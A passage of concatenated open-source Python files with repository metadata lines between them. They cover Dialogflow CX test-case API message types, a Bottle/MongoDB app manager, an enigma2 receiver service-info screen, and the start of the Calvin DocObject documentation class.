coverage_score = proto.Field(proto.FLOAT, number=2,)
class IntentCoverage(proto.Message):
r"""Intent coverage represents the percentage of all possible
intents in the agent that are triggered in any of a parent's
test cases.
Attributes:
intents (Sequence[google.cloud.dialogflowcx_v3.types.IntentCoverage.Intent]):
The list of Intents present in the agent
coverage_score (float):
The percent of intents in the agent that are
covered.
"""
class Intent(proto.Message):
r"""The agent's intent.
Attributes:
intent (str):
The intent full resource name
covered (bool):
Whether or not the intent is covered by at
least one of the agent's test cases.
"""
intent = proto.Field(proto.STRING, number=1,)
covered = proto.Field(proto.BOOL, number=2,)
intents = proto.RepeatedField(proto.MESSAGE, number=1, message=Intent,)
coverage_score = proto.Field(proto.FLOAT, number=2,)
class CalculateCoverageRequest(proto.Message):
r"""The request message for
[TestCases.CalculateCoverage][google.cloud.dialogflow.cx.v3.TestCases.CalculateCoverage].
Attributes:
agent (str):
Required. The agent to calculate coverage for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
type_ (google.cloud.dialogflowcx_v3.types.CalculateCoverageRequest.CoverageType):
Required. The type of coverage requested.
"""
class CoverageType(proto.Enum):
r"""The type of coverage score requested."""
COVERAGE_TYPE_UNSPECIFIED = 0
INTENT = 1
PAGE_TRANSITION = 2
TRANSITION_ROUTE_GROUP = 3
agent = proto.Field(proto.STRING, number=3,)
type_ = proto.Field(proto.ENUM, number=2, enum=CoverageType,)
class CalculateCoverageResponse(proto.Message):
r"""The response message for
[TestCases.CalculateCoverage][google.cloud.dialogflow.cx.v3.TestCases.CalculateCoverage].
Attributes:
agent (str):
The agent to calculate coverage for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
intent_coverage (google.cloud.dialogflowcx_v3.types.IntentCoverage):
Intent coverage.
transition_coverage (google.cloud.dialogflowcx_v3.types.TransitionCoverage):
Transition (excluding transition route
groups) coverage.
route_group_coverage (google.cloud.dialogflowcx_v3.types.TransitionRouteGroupCoverage):
Transition route group coverage.
"""
agent = proto.Field(proto.STRING, number=5,)
intent_coverage = proto.Field(
proto.MESSAGE, number=2, oneof="coverage_type", message="IntentCoverage",
)
transition_coverage = proto.Field(
proto.MESSAGE, number=4, oneof="coverage_type", message="TransitionCoverage",
)
route_group_coverage = proto.Field(
proto.MESSAGE,
number=6,
oneof="coverage_type",
message="TransitionRouteGroupCoverage",
)
class ListTestCasesRequest(proto.Message):
r"""The request message for
[TestCases.ListTestCases][google.cloud.dialogflow.cx.v3.TestCases.ListTestCases].
Attributes:
parent (str):
Required. The agent to list all pages for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
page_size (int):
The maximum number of items to return in a
single page. By default 20. Note that when
TestCaseView = FULL, the maximum page size
allowed is 20. When TestCaseView = BASIC, the
maximum page size allowed is 500.
page_token (str):
The next_page_token value returned from a previous list
request.
view (google.cloud.dialogflowcx_v3.types.ListTestCasesRequest.TestCaseView):
Specifies whether response should include all
fields or just the metadata.
"""
class TestCaseView(proto.Enum):
r"""Specifies how much test case information to include in the
response.
"""
TEST_CASE_VIEW_UNSPECIFIED = 0
BASIC = 1
FULL = 2
parent = proto.Field(proto.STRING, number=1,)
page_size = proto.Field(proto.INT32, number=2,)
page_token = proto.Field(proto.STRING, number=3,)
view = proto.Field(proto.ENUM, number=4, enum=TestCaseView,)
class ListTestCasesResponse(proto.Message):
r"""The response message for
[TestCases.ListTestCases][google.cloud.dialogflow.cx.v3.TestCases.ListTestCases].
Attributes:
test_cases (Sequence[google.cloud.dialogflowcx_v3.types.TestCase]):
The list of test cases. There will be a maximum number of
items returned based on the page_size field in the request.
next_page_token (str):
Token to retrieve the next page of results,
or empty if there are no more results in the
list.
"""
@property
def raw_page(self):
return self
test_cases = proto.RepeatedField(proto.MESSAGE, number=1, message="TestCase",)
next_page_token = proto.Field(proto.STRING, number=2,)
class BatchDeleteTestCasesRequest(proto.Message):
r"""The request message for
[TestCases.BatchDeleteTestCases][google.cloud.dialogflow.cx.v3.TestCases.BatchDeleteTestCases].
Attributes:
parent (str):
Required. The agent to delete test cases from. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
names (Sequence[str]):
Required. Format of test case names:
``projects/<Project ID>/locations/ <Location ID>/agents/<AgentID>/testCases/<TestCase ID>``.
"""
parent = proto.Field(proto.STRING, number=1,)
names = proto.RepeatedField(proto.STRING, number=3,)
class CreateTestCaseRequest(proto.Message):
r"""The request message for
[TestCases.CreateTestCase][google.cloud.dialogflow.cx.v3.TestCases.CreateTestCase].
Attributes:
parent (str):
Required. The agent to create the test case for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
test_case (google.cloud.dialogflowcx_v3.types.TestCase):
Required. The test case to create.
"""
parent = proto.Field(proto.STRING, number=1,)
test_case = proto.Field(proto.MESSAGE, number=2, message="TestCase",)
class UpdateTestCaseRequest(proto.Message):
r"""The request message for
[TestCases.UpdateTestCase][google.cloud.dialogflow.cx.v3.TestCases.UpdateTestCase].
Attributes:
test_case (google.cloud.dialogflowcx_v3.types.TestCase):
Required. The test case to update.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. The mask to specify which fields should be
updated. The
[``creationTime``][google.cloud.dialogflow.cx.v3.TestCase.creation_time]
and
[``lastTestResult``][google.cloud.dialogflow.cx.v3.TestCase.last_test_result]
cannot be updated.
"""
test_case = proto.Field(proto.MESSAGE, number=1, message="TestCase",)
update_mask = proto.Field(
proto.MESSAGE, number=2, message=field_mask_pb2.FieldMask,
)
class GetTestCaseRequest(proto.Message):
r"""The request message for
[TestCases.GetTestCase][google.cloud.dialogflow.cx.v3.TestCases.GetTestCase].
Attributes:
name (str):
Required. The name of the testcase. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/testCases/<TestCase ID>``.
"""
name = proto.Field(proto.STRING, number=1,)
class RunTestCaseRequest(proto.Message):
r"""The request message for
[TestCases.RunTestCase][google.cloud.dialogflow.cx.v3.TestCases.RunTestCase].
Attributes:
name (str):
Required. Format of test case name to run:
``projects/<Project ID>/locations/ <Location ID>/agents/<AgentID>/testCases/<TestCase ID>``.
environment (str):
Optional. Environment name. If not set, draft environment is
assumed. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>``.
"""
name = proto.Field(proto.STRING, number=1,)
environment = proto.Field(proto.STRING, number=2,)
class RunTestCaseResponse(proto.Message):
r"""The response message for
[TestCases.RunTestCase][google.cloud.dialogflow.cx.v3.TestCases.RunTestCase].
Attributes:
result (google.cloud.dialogflowcx_v3.types.TestCaseResult):
The result.
"""
result = proto.Field(proto.MESSAGE, number=2, message="TestCaseResult",)
class RunTestCaseMetadata(proto.Message):
r"""Metadata returned for the
[TestCases.RunTestCase][google.cloud.dialogflow.cx.v3.TestCases.RunTestCase]
long running operation.
"""
class BatchRunTestCasesRequest(proto.Message):
r"""The request message for
[TestCases.BatchRunTestCases][google.cloud.dialogflow.cx.v3.TestCases.BatchRunTestCases].
Attributes:
parent (str):
Required. Agent name. Format:
``projects/<Project ID>/locations/<Location ID>/agents/ <AgentID>``.
environment (str):
Optional. If not set, draft environment is assumed. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>``.
test_cases (Sequence[str]):
Required. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/testCases/<TestCase ID>``.
"""
parent = proto.Field(proto.STRING, number=1,)
environment = proto.Field(proto.STRING, number=2,)
test_cases = proto.RepeatedField(proto.STRING, number=3,)
class BatchRunTestCasesResponse(proto.Message):
r"""The response message for
[TestCases.BatchRunTestCases][google.cloud.dialogflow.cx.v3.TestCases.BatchRunTestCases].
Attributes:
results (Sequence[google.cloud.dialogflowcx_v3.types.TestCaseResult]):
The test case results. The detailed [conversation
turns][google.cloud.dialogflow.cx.v3.TestCaseResult.conversation_turns]
are empty in this response.
"""
results = proto.RepeatedField(proto.MESSAGE, number=1, message="TestCaseResult",)
class BatchRunTestCasesMetadata(proto.Message):
r"""Metadata returned for the
[TestCases.BatchRunTestCases][google.cloud.dialogflow.cx.v3.TestCases.BatchRunTestCases]
long running operation.
Attributes:
errors (Sequence[google.cloud.dialogflowcx_v3.types.TestError]):
The test errors.
"""
errors = proto.RepeatedField(proto.MESSAGE, number=1, message="TestError",)
class TestError(proto.Message):
r"""Error info for running a test.
Attributes:
test_case (str):
The test case resource name.
status (google.rpc.status_pb2.Status):
The status associated with the test.
test_time (google.protobuf.timestamp_pb2.Timestamp):
The timestamp when the test was completed.
"""
test_case = proto.Field(proto.STRING, number=1,)
status = proto.Field(proto.MESSAGE, number=2, message=status_pb2.Status,)
test_time = proto.Field(proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,)
class ImportTestCasesRequest(proto.Message):
r"""The request message for
[TestCases.ImportTestCases][google.cloud.dialogflow.cx.v3.TestCases.ImportTestCases].
Attributes:
parent (str):
Required. The agent to import test cases to. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
gcs_uri (str):
The `Google Cloud
Storage <https://cloud.google.com/storage/docs/>`__ URI to
import test cases from. The format of this URI must be
``gs://<bucket-name>/<object-name>``.
content (bytes):
Uncompressed raw byte content for test cases.
"""
parent = proto.Field(proto.STRING, number=1,)
gcs_uri = proto.Field(proto.STRING, number=2, oneof="source",)
content = proto.Field(proto.BYTES, number=3, oneof="source",)
class ImportTestCasesResponse(proto.Message):
r"""The response message for
[TestCases.ImportTestCases][google.cloud.dialogflow.cx.v3.TestCases.ImportTestCases].
Attributes:
names (Sequence[str]):
The unique identifiers of the new test cases. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/testCases/<TestCase ID>``.
"""
names = proto.RepeatedField(proto.STRING, number=1,)
class ImportTestCasesMetadata(proto.Message):
r"""Metadata returned for the
[TestCases.ImportTestCases][google.cloud.dialogflow.cx.v3.TestCases.ImportTestCases]
long running operation.
Attributes:
errors (Sequence[google.cloud.dialogflowcx_v3.types.TestCaseError]):
Errors for failed test cases.
"""
errors = proto.RepeatedField(proto.MESSAGE, number=1, message="TestCaseError",)
class TestCaseError(proto.Message):
r"""Error info for importing a test.
Attributes:
test_case (google.cloud.dialogflowcx_v3.types.TestCase):
The test case.
status (google.rpc.status_pb2.Status):
The status associated with the test case.
"""
test_case = proto.Field(proto.MESSAGE, number=1, message="TestCase",)
status = proto.Field(proto.MESSAGE, number=2, message=status_pb2.Status,)
class ExportTestCasesRequest(proto.Message):
r"""The request message for
[TestCases.ExportTestCases][google.cloud.dialogflow.cx.v3.TestCases.ExportTestCases].
Attributes:
parent (str):
Required. The agent where to export test cases from. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>``.
gcs_uri (str):
The `Google Cloud
Storage <https://cloud.google.com/storage/docs/>`__ URI to
export the test cases to. The format of this URI must be
``gs://<bucket-name>/<object-name>``. If unspecified, the
serialized test cases is returned inline.
data_format (google.cloud.dialogflowcx_v3.types.ExportTestCasesRequest.DataFormat):
The data format of the exported test cases. If not
specified, ``BLOB`` is assumed.
filter (str):
The filter expression used to filter exported test cases,
see `API Filtering <https://aip.dev/160>`__. The expression
is case insensitive and supports the following syntax:
name = <value> [OR name = <value>] ...
For example:
- "name = t1 OR name = t2" matches the test case with the
exact resource name "t1" or "t2".
"""
class DataFormat(proto.Enum):
r"""Data format of the exported test cases."""
DATA_FORMAT_UNSPECIFIED = 0
BLOB = 1
JSON = 2
parent = proto.Field(proto.STRING, number=1,)
gcs_uri = proto.Field(proto.STRING, number=2, oneof="destination",)
data_format = proto.Field(proto.ENUM, number=3, enum=DataFormat,)
filter = proto.Field(proto.STRING, number=4,)
class ExportTestCasesResponse(proto.Message):
r"""The response message for
[TestCases.ExportTestCases][google.cloud.dialogflow.cx.v3.TestCases.ExportTestCases].
Attributes:
gcs_uri (str):
The URI to a file containing the exported test cases. This
field is populated only if ``gcs_uri`` is specified in
[ExportTestCasesRequest][google.cloud.dialogflow.cx.v3.ExportTestCasesRequest].
content (bytes):
Uncompressed raw byte content for test cases.
"""
gcs_uri = proto.Field(proto.STRING, number=1, oneof="destination",)
content = proto.Field(proto.BYTES, number=2, oneof="destination",)
class ExportTestCasesMetadata(proto.Message):
r"""Metadata returned for the
[TestCases.ExportTestCases][google.cloud.dialogflow.cx.v3.TestCases.ExportTestCases]
long running operation.
"""
class ListTestCaseResultsRequest(proto.Message):
r"""The request message for
[TestCases.ListTestCaseResults][google.cloud.dialogflow.cx.v3.TestCases.ListTestCaseResults].
Attributes:
parent (str):
Required. The test case to list results for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/ testCases/<TestCase ID>``.
Specify a ``-`` as a wildcard for TestCase ID to list
results across multiple test cases.
page_size (int):
The maximum number of items to return in a
single page. By default 100 and at most 1000.
page_token (str):
The next_page_token value returned from a previous list
request.
filter (str):
The filter expression used to filter test case results. See
`API Filtering <https://aip.dev/160>`__.
The expression is case insensitive. Only 'AND' is supported
for logical operators. The supported syntax is listed below
in detail:
<field> <operator> <value> [AND <field> <operator> <value>] ... [AND latest]
The supported fields and operators are:
field             operator
``environment``   ``=``, ``IN`` (Use value ``draft`` for draft environment)
``test_time``     ``>``, ``<``
``latest`` only returns the latest test result in all
results for each test case.
Examples:
- "environment=draft AND latest" matches the latest test
result for each test case in the draft environment.
- "environment IN (e1,e2)" matches any test case results
with an environment resource name of either "e1" or "e2".
- "test_time > 1602540713" matches any test case results
with test time later than a unix timestamp in seconds
1602540713.
"""
parent = proto.Field(proto.STRING, number=1,)
page_size = proto.Field(proto.INT32, number=2,)
page_token = proto.Field(proto.STRING, number=3,)
filter = proto.Field(proto.STRING, number=4,)
class ListTestCaseResultsResponse(proto.Message):
r"""The response message for
[TestCases.ListTestCaseResults][google.cloud.dialogflow.cx.v3.TestCases.ListTestCaseResults].
Attributes:
test_case_results (Sequence[google.cloud.dialogflowcx_v3.types.TestCaseResult]):
The list of test case results.
next_page_token (str):
Token to retrieve the next page of results,
or empty if there are no more results in the
list.
"""
@property
def raw_page(self):
return self
test_case_results = proto.RepeatedField(
proto.MESSAGE, number=1, message="TestCaseResult",
)
next_page_token = proto.Field(proto.STRING, number=2,)
class GetTestCaseResultRequest(proto.Message):
r"""The request message for
[TestCases.GetTestCaseResult][google.cloud.dialogflow.cx.v3.TestCases.GetTestCaseResult].
Attributes:
name (str):
Required. The name of the test case result. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/testCases/<TestCase ID>/results/<TestCaseResult ID>``.
"""
name = proto.Field(proto.STRING, number=1,)
__all__ = tuple(sorted(__protobuf__.manifest))
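# Illustrative only (a sketch, not part of the generated client); the
# resource names below are placeholders:
#   req = ExportTestCasesRequest(
#       parent="projects/my-project/locations/global/agents/my-agent",
#       data_format=ExportTestCasesRequest.DataFormat.JSON,
#       filter='name = t1 OR name = t2')
#   res = ListTestCaseResultsRequest(
#       parent=req.parent + "/testCases/-",
#       page_size=100, filter="environment=draft AND latest")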
| apache-2.0 | -4,764,152,843,310,071,000 | 38.157173 | 133 | 0.648312 | false |
Statik-Metrics/Statik-API | internal/manager.py | 1 | 3022 | __author__ = 'Gareth Coles'
import logging
import os
import yaml
from bottle import run, default_app, request, hook
from internal.api import ApiManager
from internal.db import Db
from internal.highlight import Highlight
from internal.schemas import schemas
from internal.singleton import Singleton
from internal.util import log_request, log
class Manager(object, metaclass=Singleton):
db = {}
mongo_conf = None
mongo = None
def __init__(self):
self.apis = ApiManager()
self.highlight = Highlight()
self.app = default_app()
self.mongo_conf = os.environ.get("MONGOHQ_URL", None)
if not self.mongo_conf:
self.db = yaml.safe_load(open("config/database.yml", "r"))
self.mongo_conf = self.db["mongo"]
self.setup_mongo()
self.routes = {}
def setup_routes(self):
files = os.listdir("routes")
files.remove("__init__.py")
for _file in files:
if _file.endswith(".py"):
module = _file.rsplit(".", 1)[0]
try:
log(
"Loading routes module '{0}'".format(module),
logging.INFO
)
mod = __import__(
"routes.{0}".format(module),
fromlist=["Routes"]
)
self.routes[module] = mod.Routes(self.app, self)
except Exception as e:
log(
"Error loading routes module '{0}': {1}"
.format(module, e)
)
raise
log("{0} routes set up.".format(len(self.app.routes)))
def get_app(self):
return self.app
def setup_mongo(self):
try:
self.mongo = Db(self.mongo_conf)
self.mongo.setup()
for key in schemas.keys():
log("Adding schema for collection: {0}".format(key))
self.mongo.add_schema(key, schemas[key])
self.mongo.client.admin.command("ping")
log("Set up Mongo successfully.")
except Exception as e:
log("Unable to set up Mongo: {0}".format(e), logging.ERROR)
def start(self):
def log_all():
log_request(
request,
"{0} {1} ".format(request.method, request.fullpath)
)
hook('after_request')(log_all)
try:
config = yaml.safe_load(open("config/development.yml", "r"))
host = config.get("host", "127.0.0.1")
port = config.get("port", 8080)
server = config.get("server", "cherrypy")
except Exception as e:
log("Unable to load development config: {0}".format(e))
log("Continuing using the defaults.")
host = "127.0.0.1"
port = 8080
server = "cherrypy"
run(app=self.get_app(), host=host, port=port, server=server)
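# Usage sketch (hypothetical; assumes the config files referenced above
# exist and MongoDB is reachable):
#   manager = Manager()
#   manager.setup_routes()
#   manager.start()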
| artistic-2.0 | -2,538,337,149,603,165,700 | 28.920792 | 71 | 0.510258 | false |
eesatfan/vuplus-enigma2 | lib/python/Screens/ServiceInfo.py | 1 | 9869 | from Components.HTMLComponent import HTMLComponent
from Components.GUIComponent import GUIComponent
from Screen import Screen
from Components.ActionMap import ActionMap
from Components.Label import Label
from ServiceReference import ServiceReference
from enigma import eListboxPythonMultiContent, eListbox, gFont, iServiceInformation, eServiceCenter
from Tools.Transponder import ConvertToHumanReadable
RT_HALIGN_LEFT = 0
TYPE_TEXT = 0
TYPE_VALUE_HEX = 1
TYPE_VALUE_DEC = 2
TYPE_VALUE_HEX_DEC = 3
TYPE_SLIDER = 4
def to_unsigned(x):
return x & 0xFFFFFFFF
def ServiceInfoListEntry(a, b, valueType=TYPE_TEXT, param=4):
print "b:", b
if not isinstance(b, str):
if valueType == TYPE_VALUE_HEX:
b = ("0x%0" + str(param) + "x") % to_unsigned(b)
elif valueType == TYPE_VALUE_DEC:
b = str(b)
elif valueType == TYPE_VALUE_HEX_DEC:
b = ("0x%0" + str(param) + "x (%dd)") % (to_unsigned(b), b)
else:
b = str(b)
return [
#PyObject *type, *px, *py, *pwidth, *pheight, *pfnt, *pstring, *pflags;
(eListboxPythonMultiContent.TYPE_TEXT, 0, 0, 200, 30, 0, RT_HALIGN_LEFT, ""),
(eListboxPythonMultiContent.TYPE_TEXT, 0, 0, 200, 25, 0, RT_HALIGN_LEFT, a),
(eListboxPythonMultiContent.TYPE_TEXT, 220, 0, 350, 25, 0, RT_HALIGN_LEFT, b)
]
class ServiceInfoList(HTMLComponent, GUIComponent):
def __init__(self, source):
GUIComponent.__init__(self)
self.l = eListboxPythonMultiContent()
self.list = source
self.l.setList(self.list)
self.l.setFont(0, gFont("Regular", 23))
self.l.setItemHeight(25)
GUI_WIDGET = eListbox
def postWidgetCreate(self, instance):
self.instance.setContent(self.l)
TYPE_SERVICE_INFO = 1
TYPE_TRANSPONDER_INFO = 2
class ServiceInfo(Screen):
def __init__(self, session, serviceref=None):
Screen.__init__(self, session)
self["actions"] = ActionMap(["OkCancelActions", "ColorActions"],
{
"ok": self.close,
"cancel": self.close,
"red": self.information,
"green": self.pids,
"yellow": self.transponder,
"blue": self.tuner
}, -1)
if serviceref:
self.type = TYPE_TRANSPONDER_INFO
self["red"] = Label()
self["green"] = Label()
self["yellow"] = Label()
self["blue"] = Label()
info = eServiceCenter.getInstance().info(serviceref)
self.transponder_info = info.getInfoObject(serviceref, iServiceInformation.sTransponderData)
# info is a iStaticServiceInformation, not a iServiceInformation
self.info = None
self.feinfo = None
else:
self.type = TYPE_SERVICE_INFO
self["red"] = Label(_("Service"))
self["green"] = Label(_("PIDs"))
self["yellow"] = Label(_("Multiplex"))
self["blue"] = Label(_("Tuner status"))
service = session.nav.getCurrentService()
if service is not None:
self.info = service.info()
self.feinfo = service.frontendInfo()
print self.info.getInfoObject(iServiceInformation.sCAIDs)
else:
self.info = None
self.feinfo = None
tlist = [ ]
self["infolist"] = ServiceInfoList(tlist)
self.onShown.append(self.information)
def information(self):
if self.type == TYPE_SERVICE_INFO:
if self.session.nav.getCurrentlyPlayingServiceReference():
name = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getServiceName()
refstr = self.session.nav.getCurrentlyPlayingServiceReference().toString()
else:
name = _("N/A")
refstr = _("N/A")
aspect = self.getServiceInfoValue(iServiceInformation.sAspect)
if aspect in ( 1, 2, 5, 6, 9, 0xA, 0xD, 0xE ):
aspect = _("4:3")
else:
aspect = _("16:9")
width = self.info and self.info.getInfo(iServiceInformation.sVideoWidth) or -1
height = self.info and self.info.getInfo(iServiceInformation.sVideoHeight) or -1
if width != -1 and height != -1:
Labels = ( (_("Name"), name, TYPE_TEXT),
(_("Provider"), self.getServiceInfoValue(iServiceInformation.sProvider), TYPE_TEXT),
(_("Aspect ratio"), aspect, TYPE_TEXT),
(_("Resolution"), "%dx%d" %(width, height), TYPE_TEXT),
(_("Namespace"), self.getServiceInfoValue(iServiceInformation.sNamespace), TYPE_VALUE_HEX, 8),
(_("Service reference"), refstr, TYPE_TEXT))
else:
Labels = ( (_("Name"), name, TYPE_TEXT),
(_("Provider"), self.getServiceInfoValue(iServiceInformation.sProvider), TYPE_TEXT),
(_("Aspect ratio"), aspect, TYPE_TEXT),
(_("Namespace"), self.getServiceInfoValue(iServiceInformation.sNamespace), TYPE_VALUE_HEX, 8),
(_("Service reference"), refstr, TYPE_TEXT))
self.fillList(Labels)
else:
if self.transponder_info:
tp_info = ConvertToHumanReadable(self.transponder_info)
conv = { "tuner_type" : _("Type"),
"system" : _("System"),
"modulation" : _("Modulation"),
"orbital_position" : _("Orbital position"),
"frequency" : _("Frequency"),
"symbol_rate" : _("Symbol rate"),
"bandwidth" : _("Bandwidth"),
"polarization" : _("Polarization"),
"inversion" : _("Inversion"),
"pilot" : _("Pilot"),
"rolloff" : _("Roll-off"),
"fec_inner" : _("FEC"),
"code_rate_lp" : _("Code rate LP"),
"code_rate_hp" : _("Code rate HP"),
"constellation" : _("Constellation"),
"transmission_mode" : _("Transmission mode"),
"guard_interval" : _("Guard interval"),
"hierarchy_information" : _("Hierarchy info") }
Labels = [(conv[i], tp_info[i], TYPE_VALUE_DEC) for i in tp_info.keys()]
self.fillList(Labels)
def pids(self):
if self.type == TYPE_SERVICE_INFO:
Labels = ( (_("Video PID"), self.getServiceInfoValue(iServiceInformation.sVideoPID), TYPE_VALUE_HEX_DEC, 4),
(_("Audio PID"), self.getServiceInfoValue(iServiceInformation.sAudioPID), TYPE_VALUE_HEX_DEC, 4),
(_("PCR PID"), self.getServiceInfoValue(iServiceInformation.sPCRPID), TYPE_VALUE_HEX_DEC, 4),
(_("PMT PID"), self.getServiceInfoValue(iServiceInformation.sPMTPID), TYPE_VALUE_HEX_DEC, 4),
(_("TXT PID"), self.getServiceInfoValue(iServiceInformation.sTXTPID), TYPE_VALUE_HEX_DEC, 4),
(_("TSID"), self.getServiceInfoValue(iServiceInformation.sTSID), TYPE_VALUE_HEX_DEC, 4),
(_("ONID"), self.getServiceInfoValue(iServiceInformation.sONID), TYPE_VALUE_HEX_DEC, 4),
(_("SID"), self.getServiceInfoValue(iServiceInformation.sSID), TYPE_VALUE_HEX_DEC, 4))
self.fillList(Labels)
def showFrontendData(self, real):
if self.type == TYPE_SERVICE_INFO:
frontendData = self.feinfo and self.feinfo.getAll(real)
Labels = self.getFEData(frontendData)
self.fillList(Labels)
def transponder(self):
if self.type == TYPE_SERVICE_INFO:
self.showFrontendData(True)
def tuner(self):
if self.type == TYPE_SERVICE_INFO:
self.showFrontendData(False)
def getFEData(self, frontendDataOrg):
if frontendDataOrg and len(frontendDataOrg):
frontendData = ConvertToHumanReadable(frontendDataOrg)
if frontendDataOrg["tuner_type"] == "DVB-S":
return ((_("NIM"), ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')[frontendData["tuner_number"]], TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("System"), frontendData["system"], TYPE_TEXT),
(_("Modulation"), frontendData["modulation"], TYPE_TEXT),
(_("Orbital position"), frontendData["orbital_position"], TYPE_VALUE_DEC),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Symbol rate"), frontendData["symbol_rate"], TYPE_VALUE_DEC),
(_("Polarization"), frontendData["polarization"], TYPE_TEXT),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("FEC"), frontendData["fec_inner"], TYPE_TEXT),
(_("Pilot"), frontendData.get("pilot", None), TYPE_TEXT),
(_("Roll-off"), frontendData.get("rolloff", None), TYPE_TEXT))
elif frontendDataOrg["tuner_type"] == "DVB-C":
return ((_("NIM"), ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')[frontendData["tuner_number"]], TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("Modulation"), frontendData["modulation"], TYPE_TEXT),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Symbol rate"), frontendData["symbol_rate"], TYPE_VALUE_DEC),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("FEC"), frontendData["fec_inner"], TYPE_TEXT))
elif frontendDataOrg["tuner_type"] == "DVB-T":
data = ((_("NIM"), ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')[frontendData["tuner_number"]], TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("System"), frontendData["system"], TYPE_TEXT),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("Bandwidth"), frontendData["bandwidth"], TYPE_VALUE_DEC),
(_("Code rate LP"), frontendData["code_rate_lp"], TYPE_TEXT),
(_("Code rate HP"), frontendData["code_rate_hp"], TYPE_TEXT),
(_("Constellation"), frontendData["constellation"], TYPE_TEXT),
(_("Transmission mode"), frontendData["transmission_mode"], TYPE_TEXT),
(_("Guard interval"), frontendData["guard_interval"], TYPE_TEXT),
(_("Hierarchy info"), frontendData["hierarchy_information"], TYPE_TEXT))
if frontendData.has_key("plp_id"):
data += ((_("PLP ID"), frontendData["plp_id"], TYPE_VALUE_DEC), )
return data
return [ ]
def fillList(self, Labels):
tlist = [ ]
for item in Labels:
if item[1] is None:
continue
value = item[1]
if len(item) < 4:
tlist.append(ServiceInfoListEntry(item[0]+":", value, item[2]))
else:
tlist.append(ServiceInfoListEntry(item[0]+":", value, item[2], item[3]))
self["infolist"].l.setList(tlist)
def getServiceInfoValue(self, what):
if self.info is None:
return ""
v = self.info.getInfo(what)
if v == -2:
v = self.info.getInfoString(what)
elif v == -1:
v = _("N/A")
return v
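# Illustration of the value formatting above (not part of the original file):
#   ServiceInfoListEntry("Video PID:", 8191, TYPE_VALUE_HEX_DEC, 4)
# renders the value column as "0x1fff (8191d)".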
| gpl-2.0 | -2,097,492,960,710,691,000 | 38.794355 | 111 | 0.644544 | false |
EricssonResearch/calvin-base | calvin/actorstore/docobject.py | 1 | 12850 | import json
import inspect
import pystache
from calvin.utilities.calvinlogger import get_logger
_log = get_logger(__name__)
class DocObject(object):
"""docstring for DocObject"""
use_links = False
COMPACT_FMT = "{{{qualified_name}}} : {{{short_desc}}}"
DETAILED_FMT_MD = "{{{e_qualified_name}}} : {{{e_short_desc}}}"
DETAILED_FMT_PLAIN = COMPACT_FMT
def __init__(self, namespace, name=None, docs=None):
super(DocObject, self).__init__()
self.ns = namespace
self.name = name
if type(docs) is list:
docs = "\n".join(docs)
self.label = "DocObject"
self.docs = docs.rstrip() or ""
#
# Allow templates to use e_attr to access an escaped version of attribute attr
#
def __getattr__(self, synthetic_attr):
if not synthetic_attr.startswith('e_'):
raise AttributeError("No such attribute: %s" % synthetic_attr)
_, attr = synthetic_attr.split('_', 1)
if not hasattr(self, attr):
raise AttributeError("No such attribute: %s" % attr)
x = getattr(self, attr)
# N.B. Kind of escape should depend on desired output
return self._escape_text(x)
def _escape_text(self, txt):
def _escape_line(line):
if line.startswith(' '):
return line
for c in "\\<>*_{}[]()#+-.!":
line = line.replace(c, "\\"+c)
return line
lines_in = txt.split('\n')
lines_out = [_escape_line(line) for line in lines_in]
return "\n".join(lines_out)
@property
def has_actors(self):
return False
@property
def has_modules(self):
return False
@property
def qualified_name(self):
if self.name:
return "{}.{}".format(self.ns, self.name)
return self.ns
@property
def own_name(self):
return self.name or self.ns
@property
def short_desc(self):
short_desc, _, _ = self.docs.partition('\n')
return short_desc
@property
def slug(self):
return self.qualified_name.replace('.', '_')
#
# "API" to produce output from a DocObject
#
def compact(self):
fmt = inspect.cleandoc(self.COMPACT_FMT)
return pystache.render(fmt, self)
def detailed(self):
fmt = inspect.cleandoc(self.DETAILED_FMT_PLAIN)
return pystache.render(fmt, self)
def markdown(self):
DocObject.use_links = False
fmt = inspect.cleandoc(self.DETAILED_FMT_MD)
return pystache.render(fmt, self)
def markdown_links(self):
DocObject.use_links = True
fmt = inspect.cleandoc(self.DETAILED_FMT_MD)
return pystache.render(fmt, self)
def metadata(self):
return {'is_known': False}
def __repr__(self):
def _convert(x):
try:
return x.name or x.ns
except:
return None
r = {'type':str(self.__class__.__name__)}
r.update(self.__dict__)
return json.dumps(r, default=_convert)
class ErrorDoc(DocObject):
"""docstring for ErrDoc"""
COMPACT_FMT = "({{{label}}}) {{{qualified_name}}} : {{{short_desc}}}"
DETAILED_FMT_MD = "({{{label}}}) {{{e_qualified_name}}} : {{{e_short_desc}}}"
DETAILED_FMT_PLAIN = COMPACT_FMT
